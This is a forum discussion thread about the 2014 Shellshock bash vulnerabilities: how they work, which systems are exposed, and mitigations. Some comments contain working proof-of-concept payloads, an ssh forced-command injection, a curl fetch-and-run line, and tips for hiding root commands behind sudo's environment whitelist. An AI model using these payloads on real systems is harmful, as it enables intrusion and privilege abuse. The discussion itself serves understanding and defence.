I never really considered the importance of that. It always seemed like some weird crotchety UNIX thing to default to /bin/sh, and usually my first 30 minutes on a FreeBSD box are portsnapping, cd /usr/ports/shells/bash, and a make install clean.

Now I get it


The other reason is that bash has dependencies outside the core system and can therefore be totally broken on FreeBSD. Never change root's shell to bash!


Debian also has a minimalist /bin/sh (via dash), but unlike FreeBSD they do ship bash in the base install, as the default interactive shell. Which is the default interactive shell doesn't matter much, since interactive shell usage isn't the likely vector of this exploit. However some Debian packages may explicitly call bash (rather than /bin/sh), since they can assume it's in the base install, while we know for sure no base FreeBSD packages do. I'm not sure whether anyone's done a survey yet of which Debian packages shell out to bash vs. dash vs. nothing.


I think Android uses mksh[1] these days too.

[1]: http://www.all-things-android.com/content/mirbsd-korn-shell-...


All software with more than a few lines of code contains bugs. Zsh doesn't support the misfeature of exported functions so is not vulnerable to this issue.


I've been trying to exploit our own systems which have PHP web frontends running under apache/mod_php, and in my testing PHP isn't passing through any HTTP_* environment variables at all in calls to system() or exec().

Even just echoing back the result of "env", it doesn't look like I get anything user-supplied whatsoever in there (no HTTP_*).

Can anyone more knowledgeable confirm what I've seen?


CGI is affected. When using mod_php, the request headers aren't passed via environment.


Another PoC:

env -i X='() { (a)=>\' bash -c 'echo curl -s https://bugzilla.redhat.com/'; head echo

Creates file called echo and outputs the contents using head.

(from https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c24)


[deleted]


You might want to make sure the symlink is really in effect -- try temporarily deleting bash or making it non-executable:

# chmod -x `which bash`


Appears to work, even with latest patches, by using sh (from the link):

  $ env X='() { (a)=>\' sh -c "echo date"; cat echo
  date
  Wed Sep 24 15:00:34 PDT 2014

  -- previous bug fix for bash (before/after patch) --

  $ x='() { :;}; echo vulnerable' bash -c 'echo test'
  vulnerable
  test

  $ x='() { :;}; echo vulnerable' bash -c 'echo test'
  bash: warning: x: ignoring function definition attempt
  bash: error importing function definition for `x'
  test
Tested on Ubuntu 14.04.1 LTS & Debian GNU/Linux 7.0 (wheezy) with latest patches.

ps. lots of chatter about the original issue @ https://news.ycombinator.com/item?id=8361574


I don't think either you or the author are correct.

    hobbes@media:~$ env X='() { (a)=>\' sh -c "echo date"; cat echo
    date
    cat: echo: No such file or directory
    hobbes@media:~$ uname -a
    Linux media 3.13-1-686-pae #1 SMP Debian 3.13.5-1
    hobbes@media:~$ echo $BASH_VERSION
    4.3.25(1)-release
It looks to me like we're setting X in the environment, calling `sh -c "echo date"`, passing that X in to it, nothing happens, then we're cat'ing a file named echo, which does not get created in the first place, at least not on my machine.

I played with the original test a bit. You can break it into two lines to see what is happening. For example:

    1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. bash: warning: badvar: ignoring function definition attempt
    4. bash: error importing function definition for `badvar'
    5. I am an innocent sub process in 4.3.25(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash spots the specially formed variable (named badvar), prints a warning,

4. ...and apparently doesn't define the function at all?

5. But other than that, the child bash runs as expected.

    1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. vulnerable
    4. I am an innocent sub process in 4.3.22(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!

4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)


The above one didn't work for me either (it never created the file) but the example someone gave below where it's split up worked for me.

Run

    export X="() { (a)=>\\"

now run

    bash -c 'echo date'

Now under no normal circumstances should I have a file named echo in my current directory. But I do!

In fact, once that environment variable is set, every time I run bash -c 'XXXX date' I end up with a file named XXXX in my current directory. There's no way that should be happening.


> I don't think either you or the author are correct.

This is out of date, but I can't edit my comment anymore.

Carry on. :)


Switch sh to bash and it will work (create a file called echo)


It is curious to see how bash is mentioned everywhere, while the real culprit is the interaction between some web server and bash. Seriously, polluting ENV with HTTP headers? Admins should at least be able to block this.

It should be possible to mitigate this attack (and many similar ones) by better parsing of header values (in Apache/nginx/... - maybe in some proxy?). For instance, the Content-Type header can only include alphanumeric chars + slashes. Most of the other headers are similar. User-Agent is free-form, but there is no need to pass it to ENV (and it could be sanitized to only include alphanumeric chars and spaces).

Any idea whether web server maintainers are working on this?


> It is curious to see how bash is mentioned everywhere, while the real culprit is the interaction between some web server and bash.

The web server side only comes into play for remote exploits. It is locally exploitable too (though the potential for useful exploits that way is lower, it is still a significant risk).


Care to elaborate? AFAIK this bug is about remote execution, not about privilege escalation. The reason is that the shell would be run with the same privileges as the user who is setting the ENV variables, and only privileged users should be able to set system-wide ENV vars.


I can think of a few ways this could be a problem if you sudo. Sudo is configured to whitelist environment variables, so just figure out which ones are on the whitelist, or find half the people who have aliased sudo='sudo -E'. From man sudo on OS X:

    SECURITY NOTES
       sudo tries to be safe when executing external commands.  Variables that control how dynamic loading and binding is done can be used to subvert the program
       that sudo runs.  To combat this the LD_*, _RLD_*, SHLIB_PATH (HP-UX only), and LIBPATH (AIX only) environment variables are removed from the environment
       passed on to all commands executed.  sudo will also remove the IFS, CDPATH, ENV, BASH_ENV, KRB_CONF, KRBCONFDIR, KRBTKFILE, KRB5_CONFIG, LOCALDOMAIN,
       RES_OPTIONS, HOSTALIASES, NLSPATH, PATH_LOCALE, TERMINFO, TERMINFO_DIRS and TERMPATH variables as they too can pose a threat.  If the TERMCAP variable is
       set and is a pathname, it too is ignored.  Additionally, if the LC_* or LANGUAGE variables contain the / or % characters, they are ignored.  Environment
       variables with a value beginning with () are also removed as they could be interpreted as bash functions.  If sudo has been compiled with SecurID support,
       the VAR_ACE, USR_ACE and DLC_ACE variables are cleared as well.  The list of environment variables that sudo clears is contained in the output of sudo -V
       when run as root.
From man sudo on Ubuntu Linux: Note, however, that the actual PATH environment variable is not modified and is passed unchanged to the program that sudo executes.


Specifically, here's Debian's output of sudo sudo -V:

    Environment variables to preserve:
        XAUTHORIZATION
        XAUTHORITY
        TZ
        PS2
        PS1
        PATH
        LS_COLORS
        KRB5CCNAME
        HOSTNAME
        DISPLAY
        COLORS
Just set any of those on an account with sudo access to something that runs bash. Even if the bash command was something trivial.


That makes me think of another facet of this bug: it can bypass logging by sudo of the executed commands.

A quick look at journalctl's output shows that sudo by default, at least on the distribution I'm using, logs only the original user, the tty, the current working directory, the target user, and the command. It does not seem to log the environment variables.

So you could use an innocent-looking sudo command (like "sudo ls") to hide doing something else as root, without using obvious commands like "sudo bash" or "sudo -i".


Yes, just put a bash script called ls in $HOME/bin, put that directory in $PATH, run sudo ls, and off you go...

Hopefully you would not be white-listed to run things like that (always put the full path in sudoers), so you will need some sort of "obviously bash" in the log, but we all know what we have done when dealing with paper-cuts. We have probably all lessened our security to ease discomfort here and there.


I've tested this on both Ubuntu 14.04 and CentOS 6.5, and they both sanitize the path variable such that this is not possible.

I believe this is controlled via the secure_path setting in your /etc/sudoers file.


When I ran "sudo ls", the command that was logged was "/bin/ls", so putting a different ls in $PATH would not trick sudo's logging.


... didn't the above say "we clear anything that starts with ()"? Doesn't that defang this?


The problem is in bash, so it is potentially exploitable wherever bash is used, while web servers could try to mitigate it with extra request filtering as an interim measure that may not be 100% effective (it comes down to "enumerating the bad" - how do you make sure you filter out everything that could be a problem without accidentally filtering out something valid, required, and safe?).

A malicious user with access to certain commands via sudo or similar could potentially use this to gain further access.


Someone else in this discussion mentioned that the badness is the exact four characters "() {" at the start of an environment variable. Filtering out all environment variables starting with these four characters should be 100% effective, and I wouldn't be surprised if Apache, sshd, sudo, dhclient, and others start filtering out values that start with precisely these four characters.

I don't think these four characters at the start of an environment variable are common; if they were, this bug would have been found out much sooner. It should be safe to filter them out.
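
If you want to do that filtering in front of your own code, something like this works as a crude pre-spawn scrub (a sketch in bash itself; note it only protects children started after it runs, and the CGI path at the end is a placeholder):

    scrub_funcdefs() {
        local name
        for name in $(compgen -e); do                        # every exported variable name
            [[ ${!name} == '() {'* ]] && export -n "$name"   # stop exporting the suspicious ones
        done
    }
    scrub_funcdefs
    exec /usr/lib/cgi-bin/some-handler                       # placeholder for whatever you actually run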


But there you are fixing the symptom (the web server issue), not the problem (which lies in bash), so you need that fix everywhere that bash is used and not just in one place (in bash itself).

It could be a useful interim measure for code that implements it, but only if the update gets written, tested, and released before the update to bash is available - and it would weigh down the package maintainers for the distros as they'd have a sudden glut of updates coming downstream for this one issue instead of one update for one package.

People who aren't going to update bash as soon as an update is available aren't going to update everything else (where "everything else" is a set containing at least Apache, probably other web servers, and maybe many other apps) as quickly either - so fixing bash is the best course and the quickest resolution, and changing Apache and friends isn't going to have any benefit: either people update in a timely manner (so the bash fix sorts their problem) or they don't (and no end of updates will solve their problem because they don't have any of them installed).


Practically speaking, there's not a lot of difference between arbitrary code execution and privilege escalation. There are a lot of local exploits for most operating systems. So once I can execute some arbitrary commands, I can simply:

   curl http://www.exploits.org/local_exploit1 -o iwin; ./iwin
(or more sophisticated variants that ensure the code is executable).

Even if you assume an otherwise perfect OS, this is dangerous, because e.g. www-data can usually access more code and data than any given web app user could. So now I could (e.g.) start dumping the database, which I accessed because I found the password in a PHP file www-data has to be able to read.

Keep in mind that a lot of information is passed around with environment variables - it's what they are for (keeps the need for complex command line parsing - a source of bugs itself - down). So while everyone is tying the exploit to web servers, that is because it is a trivial example of a place input data can be turned into an environment variable. There are undoubtedly others - to a large extent shell scripts still run the world.


For it to be interesting, it still requires some situation where a shell is run with data provided by someone who could not have just run a shell with the same context (UID, &c) themselves. There doubtless are others - as you say, scripts still run the world - but web is by far the most obvious.


Here's one way: if you have SSH access to a server but aren't allowed to log in (a Git server, for example) you can use this exploit to execute commands on the server. Only with your own privileges admittedly but without this exploit you wouldn't be able to execute commands at all.


No, the real culprit is bash. Environment variables are a perfectly valid way to pass information around in a Unix environment. Let's not ruin the utility of environment variables because bash decided to do something idiotic with them.


I'd like to check if my home router is vulnerable to this over HTTP or DHCP or SSH. Is there any tool I can use, like the heartbleed folks had?

My router runs DD-WRT (an old version which I can't upgrade), has an administration web page and has ssh access enabled. It does not have remote web administration enabled. Any tips?


SSH in and look at your iptables. If any inbound ports are open besides state RELATED,ESTABLISHED (required for NAT), delete those rules. Reboot the router and verify that the lines do not reappear -- you may need to add a startup script to your admin page that deletes the rules on each startup.

That doesn't prevent an XSS attack on the admin page if you view a malicious web page on a browser within your home network, but it's a first step.
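
Concretely, that check looks something like this on a DD-WRT shell (chain layout differs between builds, so read carefully before deleting anything):

    iptables -L INPUT -n -v --line-numbers    # look for ACCEPT rules on WAN-facing ports
    iptables -D INPUT 3                       # then delete by rule number (3 is only an example)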


Isn't the router still at risk after taking these precautions seeing as many routers shell out for ping and traceroute-responses?


Thank you!


Do I correctly understand that there were `expr 7169 - 6271` 898 potential (or is that confirmed?) vulnerabilities tracked in the few hours between those two mailing list messages?

If true, I never really comprehended the volume of vulnerabilities flying by every day.


Actually, no. You can sleep more easily tonight.

Typically the CVE is assigned when the vulnerability is reported to the maintainer after it's initially discovered, before it's been made public. So really the difference represents how many other vulnerabilities there have been between the first time this was discovered (which could be months, could be weeks, I didn't check) and now.

Since 7169 was only discovered today, it immediately got assigned a new CVE while still public.

Also, the last number in the ID represents the total number of vulnerabilities tracked by CVEs in the year mentioned in the middle. So, there have been 7169 vulnerabilities in all sorts of different software this year.


Stumbled upon https://gist.github.com/anonymous/929d622f3b36b00c0be1

Just to verify; apache httpd / nginx without CGI-support is not vulnerable?


That's not how to think about it. Your web application is vulnerable if it spawns shell scripts with any user-supplied data in the environment.

One way for that to happen is if your CGI-application runs things via os.system() / system(). It is not the web server itself that has the problem, nor any common CGI-setup (unless you write your CGI-scripts in bash, in which case you are guaranteed to have other problems).


If I understand it correctly, nginx in that gist refers to a binary that is not nginx and is only named that so it won't look suspicious in the process listing. Apache httpd / nginx without CGI should not be vulnerable. However, if you use PHP or any other language and that performs some sort of system() call, there's a vulnerability.


That's what I initially figured, but was left uneasy after seeing the Gist and trying to Google about it.


I can't imagine why people are so paranoid about the tech companies having backdoors (especially when they explicitly deny it) when the NSA or other intelligence agencies could have lots of unknown vulnerabilities to exploit.


You should be paranoid about both because they're the same thing.

One tech company's backdoor is another NSA's vulnerability to exploit (and silence with an NSL).


Link to the vulnerability report for Debian if someone needs it: https://security-tracker.debian.org/tracker/CVE-2014-7169



Tried this patch on my system and was unable to get any of the latest PoC's to trigger the bug.


Here is a simple little tool to check if your website is vulnerable http://milankragujevic.com/projects/shellshock/


Cool tool! Thanks!

If you're accepting feature requests, it would be nice if it accepted port numbers as well. Also a way to check a subsequent website without reloading the page first would be nice.


Say I have a Perl CGI script that interfaces with ffmpeg and imagemagick with backtick operators. Am I vulnerable by default? Is there anything I can do to protect myself other than take them offline?


lol @ this: http://seclists.org/oss-sec/2014/q3/681

Soon someone will be suggesting that you have to add some random string to all of your env variables to make them work, otherwise they are ignored, like with CSRF mitigation.

Actually, I jest, but that's probably a good idea: anything running on the system could view some /tmp file with the string and append it to the env variable string or something, but any remote client wouldn't be able to access that.

Hmm...


My Solaris box defaults to tcsh but has bash installed; am I affected?


Depends. Does any remotely accessible code anywhere on your system end up shelling out to bash explicitly?


Probably not, if you're not using a service with a user who uses bash as default shell.


Ubuntu Trusty's patched version 4.3 doesn't seem to be affected by this, but the Precise version (4.2, the same one as in Debian) still is.

Is this new exploit version dependent?


PoC floating around:

    rm -f echo && env -i X='() { (a)=>\' bash -c 'echo date'; cat echo


Can someone please elaborate as to why this works? I'm unable to understand how in hell Bash turns this PoC into "date>echo".

rm -f echo && <---- Irrelevant, removes old echo files.

env -i X=' <---- Start definition of an environment variable.

() { <---- Function definition which is expected by the parser according to the codebase.

(a)= <---- I have no idea what this [1] is or [2] does.

>\ <---- I have no idea what this [3] is, but I kinda know what it does. Executing ">\echo date" in a bash term somehow yields the same result as "date > echo". Is this a feature? [4] Does bash have a ">\" operator? [5]

' bash -c 'echo date'; cat echo <----- End the environment variable definition, run a new shell so that the vars get loaded and output the contents of the file "echo" if created.

I would really appreciate anyone shedding some light on [1]...[5].


Your unescaped quotes don't pair up.


They don't need to. "\" isn't an escape sequence inside single-quotes.

  echo 'abc\'
will echo four characters: a, b, c, and \

The \' in the original command isn't trying to escape the quote; it's ending the environment variable with a "\".


Not sure I follow this either. So you are setting a variable containing a function definition that is not supposed to be allowed, and then calling bash.

Is the naughty thing that the malformed function definition is supposed to prevent bash from executing it?

If so, I still don't get how this is a possible RCE. Nothing from the environment variable definition persists.


Reproduced from another discussion thread.

Try this slight variation:

  $ export X="() { (a)=>\\"
  $ bash -c 'echo date'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  $ cat echo
  Thu Sep 25 02:27:07 UTC 2014
Setting "X" in that way confuses the bash env variable parser. It barfs at the "=" and leaves the ">\" unparsed

AFAICT (without digging deep into the code) that leave in the execution buffer as ">\[NEWLINE]echo date" which gets treated the same as

  date > echo
It causes the command to be interpreted (executed) in a totally different way than it was supposed to, with the nice side effect of modifying files.

See one of my other comments for an example that uses the same flaw to read files.

I don't think anyone has found an RCE path for it yet though.
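
One way to see the end result by hand (assuming, as described above, that the unparsed remainder is ">\" followed by a newline): backslash-newline is a line continuation, so bash effectively reads ">echo date", i.e. the command "date" with stdout redirected to a file named "echo". Typed directly:

  >echo date    # a redirection may precede the command word: runs "date" into ./echo
  cat echo      # shows the captured timestamp, just like the PoC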


Thanks, that does entirely clear it up for me: I was missing the obvious (in hindsight):

Under normal circumstances:

  $ bash -c 'echo date'
  date
With this attack, instead of echoing the word "date", it is actually executing something like

  date > echo
So what happens then as you and others demonstrated:

  $ export X="() { (a)=>\\"
  $ bash -c 'echo date'
   bash: X: line 1: syntax error near unexpected token `='
   bash: X: line 1: `'
   bash: error importing function definition for `X'

  $ cat echo
   Wed Sep 24 22:38:19 EDT 2014
"echo" is now a file in my current working dir. Definitely fishy business. .. the whole flip flop of echo date to date > echo so easy to miss


I run an Ubuntu server in my closet as a general-purpose file server and such, mostly just for my own use or for sending files to friends. I have just turned it off and disabled all port forwards to it, and I will wait at least a few days and check for a more definitive fix before opening it back up to the internet. I recommend anyone in a similar situation do the same.


The only attack vectors I've seen so far are:

* webservers that are configured to run things via the ancient CGI interface. There are lots of these on the internet (so that's bad) but most OSes aren't going to be vulnerable out of the box or anything. Also, the biggest risk is if you're on a server where /bin/sh is bash, which is not the case for Ubuntu.

* people running sshd who have users that are allowed to ssh but not run a shell -- for instance by having "command=" settings in a .ssh/authorized_keys file (see the sketch after this list). Most people won't have this. It's a pattern most associated with services like GitHub, which lets you use git-over-ssh but not run arbitrary programs on their servers. Another example would be if you've set up a special key for a backup system to connect over ssh and run rsync. Most servers aren't going to have these things. If you're just using sshd for normal user logins there is no impact: you can "exploit" the bug and run arbitrary commands, but only if you have the same credentials you could have used to log in and run them yourself anyway.

* DHCP clients could be affected, but only if the server is already compromised (or spoofed) which probably isn't a huge concern for your home network.

So you're probably overreacting here. Certainly stay up-to-date on the patches as they come out for safety, though.
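
To make the second bullet concrete, here's a hedged sketch of how a forced command gets bitten (the key name, script path, and account below are hypothetical): sshd exports whatever the client asked to run as SSH_ORIGINAL_COMMAND, and if the account's login shell (which sshd uses to run the forced command) is an unpatched bash, that variable is imported as a function definition and its trailing payload runs.

  # In ~backup/.ssh/authorized_keys, a forced-command entry like:
  #   command="/usr/local/bin/rsync-only.sh" ssh-rsa AAAA... backup-key
  # prevents the client from choosing the command, but the client's request is
  # still exported as SSH_ORIGINAL_COMMAND.  A request like this then runs the
  # payload when an unpatched bash imports that variable:
  ssh -i backup-key backup@host '() { :;}; echo owned >> /tmp/owned'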


Why?

Why don't you uninstall bash altogether? Most programs should be using '/bin/sh' and not bash. (IIRC Linux might have a symlink between the two, which is awful.) You could install zsh.

You could add further security layers, harden your network-level access, monitor your logs, and so forth. Security is a set of policies. If you think there are users with unauthorized access to your system, or you run bash-enabled CGI scripts, then disable them (you shouldn't be using those in the first place anyway), lock out unauthorized users, change your passwords, etc.

The panic is for admins who handle systems with multiple users (universities, etc.) and offer (even restricted) shell access. For those guys it might be hard to sleep at night, but for someone running a file server it shouldn't really make any difference.


>Most programs should be using '/bin/sh' and not bash.

Why? There are some non-trivial things that you can do in bash but not in sh (or dash) [1]. Remaining POSIX-compatible by never adding additional features seems like a great way to never make any forward progress.

[1]: http://mywiki.wooledge.org/Bashism
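
A few concrete examples of the difference, if you're curious (illustrative only; the page above has the full catalogue). All three of these work in bash but fail in dash:

  if [[ "$name" == foo* ]]; then echo match; fi   # [[ ]] tests and pattern matching
  files=( *.log )                                  # arrays
  diff <(sort a.txt) <(sort b.txt)                 # process substitution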


From FreeBSD manual page for 'sh':

     DESCRIPTION
     The sh utility is the standard command interpreter for the system.  The current version of sh is close to the IEEE Std 1003.1 (“POSIX.1”) specification for the shell.  It only supports features designated by POSIX, plus a few Berkeley extensions.  [...]
Again from FreeBSD manual for 'bash':

      DESCRIPTION
      Bash  is  an  sh-compatible  command language interpreter that executes commands read from the standard input or from a file.  Bash also incorporates useful features from the Korn and C shells (ksh and csh). Bash  is  intended  to  be a conformant implementation of the Shell and Utilities portion  of  the  IEEE  POSIX  specification  (IEEE  Standard 1003.1).  Bash can be configured to be POSIX-conformant by default.

These two shells are different, and the reason FreeBSD keeps '/bin/sh' is that it was designed to be secure and reliable rather than full-featured. Makes sense as a choice; it is aligned with the general UNIX philosophy: do one thing, do it well, keep it as simple as possible.

Given the fact that the bug was found in bash, I guess it's just (another) win for this harsh philosophy that so many geeks seem to strongly embrace.


I don't have the time right now to figure out what the default shell is, whether Ubuntu supports switching it, and whether I have any custom scripts or some such that assume /bin/sh is bash. So the easiest thing to do is just disconnect it for now.


No need to go to that length. Ubuntu uses dash as its standard /bin/sh. If you're super paranoid, chmod /bin/bash to 000 and fix any broken scripts that use that shebang; most likely they don't use any bashisms and can use the stock Bourne shell.
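
A minimal sketch of that suggestion (assuming you can live without bash until a complete fix lands, and that the paths below match your system):

  # Make bash unrunnable for now, then find scripts that explicitly ask for it:
  sudo chmod 000 /bin/bash
  grep -rl '^#!/bin/bash' /etc /usr/local/bin 2>/dev/null
  # Undo once a proper patch is installed:
  sudo chmod 755 /bin/bash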


I just tested on fully patched Ubuntu 14.04 - still vulnerable per this method.


[deleted]


If it's truly unused, you should be using /bin/false instead of /bin/sh. Note that /bin/sh is not always dash, so just because you are using /bin/sh over /bin/bash doesn't mean you're not vulnerable.


Trivia: /bin/false (not surprisingly) exits with a failure. I read some time ago of some *nix (I don't recall which) recognizing that the attempt to start a shell (/bin/false) "failed" and helpfully starting /bin/sh for you so you could recover your system. I still use /bin/true as my "not a shell" shell for this reason.


/bin/nologin exists for this reason - if nothing's supposed to be logging in as that user, surely you want a log of when someone tries!
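
If you go that route, the shell for a service account can be switched with standard tools (hedged: "backupuser" is a placeholder, and the nologin path is /usr/sbin/nologin or /sbin/nologin depending on the distro):

  # Refuse logins for the account and get a refusal message (and a log entry) on attempts:
  sudo usermod -s /usr/sbin/nologin backupuser
  # Or, per the comment above, use /bin/true as the "not a shell" shell:
  sudo usermod -s /bin/true backupuser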


Hi everyone,

We just published this tool to test for Shellshock: https://suite.websecurify.com/market/shellshock

Do a scan before it's too late.


Is this a problem even if /bin/sh is not bash? I'm pretty confused about why one would ever want /bin/sh to be bash (and not, say, dash). If you want bash, ask for it.


My Zsh seems vulnerable. Anyone else care to replicate this?

  ➜ ~ zsh --version
  zsh 5.0.2 (x86_64-apple-darwin13.0)
  ➜ ~ echo $SHELL
  /bin/zsh
  ➜ ~ env x='() { do_something;}; echo vulnerable' bash -c "echo this is a test"
  vulnerable
  this is a test


You are using bash there...


If you do it correctly by using zsh instead of bash, you will see that it is not vulnerable:

  env x='() { do_something;}; echo vulnerable' zsh -c "echo this is a test"
  this is a test



An accepted patch has been released in the form of 4.3-9.1 [1]. It's available on Debian everywhere except oldstable.

[1] http://osdir.com/ml/general/2014-09/msg47743.html


That's the previous patch, and it didn't fix all the cases. As far as I know, the new issue is still unpatched, and people are carefully going through the thicket of string parsing to try to fix it for good.


Doesn't appear to have made it into jessie.


I'm very annoyed by the finder of this exploit. If you are going to release something as serious as this, at least work on a solution first. The bash source code is open and out there; isn't that supposed to be one of the "benefits" of open source? Gee.


Look at the original announcement from earlier today. This was a known issue and responsible disclosure was exercised -- the issue didn't become public until 5 minutes after the embargo was lifted (i.e., 5 minutes after it was agreed the issue and patch would go public). Since it's so easy to exploit this bug, it'd be impossible to release a patch without people taking notice and immediately beginning to exploit vulnerable systems.

Someone just did a really bad job vetting the patch for thoroughness.


Chet (the bash maintainer) has indicated that this issue is different from the original CVE.

The problem is that the first issue alerted people to the fact that the function var parsing was an interesting, previously unpublicized attack vector, and they started looking for more funkiness there.

It would have been nice if the response to the first issue had been to do a thorough and complete testing of the parsing code, but it's not really surprising that it wasn't.


I don't think that's fair. What if he doesn't know how?

He could propose a patch, sure, but exploiting a code base may not require in-depth knowledge of it, while making a good patch is much more likely to. (I suppose in an ideal situation the fix would be localized to a spot where one would only have to understand a screenful or two of code, but in my experience this is not usually the case.)


I wouldn't be surprised if he found it by accident. This exploit seems a lot easier to stumble upon in "normal" usage than something like Heartbleed for instance.


That's what I'm guessing too. It's not easy to come up with a patch that will definitively prevent an exploit. It's also very possible the exploit finder didn't understand the intricate details of why the exploit worked; he just knows it works.



